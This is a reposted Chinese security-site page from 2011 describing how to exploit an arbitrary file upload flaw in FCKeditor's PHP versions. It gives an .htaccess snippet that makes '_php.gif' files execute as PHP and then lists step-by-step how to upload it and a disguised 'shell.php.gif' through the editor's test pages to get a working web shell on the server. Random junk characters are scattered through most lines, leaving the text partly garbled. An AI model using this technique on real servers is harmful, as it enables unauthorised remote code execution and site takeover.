FCKeditor所有php版本Upload上传漏洞
3 q4 v) |# T. Z; @3 ]作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
4 D; v9 e. _ I减小字体 增大字体) o+ a% u) r. `3 f
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability9 m: {0 _# A% |1 }
[+] Date: 20117 a9 j7 X5 E9 S9 a
[+] Author : sinesafe.cn f" M: n/ b z# q% Z" d$ ^$ _
[+] Website : WwW.sinesafe.cn |! d3 ]1 H( G0 D5 `3 G R7 n
———————————————————# }5 L; K$ {0 u, [# Y+ }3 H
1.create a htaccess file:# b7 u& O6 ]5 U0 K! `1 L
code:
' U0 V) M: d2 y9 Y( a& @5 Y<FilesMatch “_php.gif”>
5 [, y) e ~3 Z! c" t, ySetHandler application/x-httpd-php$ U; t) \8 j v2 b5 i% ^0 B4 Q( U
</FilesMatch>
: D; s: z+ H) T L# f: e3 b. P
0 g7 L. C4 ?+ ~% h, p4 `2.Now upload this htaccess with FCKeditor.% k0 |7 z0 g* q" T$ p* j3 [
5 f7 I7 i9 A: D+ R+ m, M; l
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
: ~, R$ J3 Z3 u. q& l$ y
0 J) p% f; C7 ~0 q2 shttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html
2 }7 l# Q6 B7 _* J0 ?4 S9 `; n8 z- q9 O m+ T
———————————————————————————————-0 Z1 D; e, f. H! D; q2 d% ]
3.Now upload shell.php.gif with FCKeditor.' l1 |$ X& u- X5 m
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
& \/ N2 ^: w) Z9 e6 V1 ?# y5.http://www.sinesafe.cn/anything/shell_php.gif
, l( H% k. i t J* [' F6.Now shell is available from server. |
* ?& t! A8 |3 _2 K) \3 M0 j$ V4 E. m; P& L! q7 x$ Y" [
- F7 J& o1 C6 H* Q' A- [
|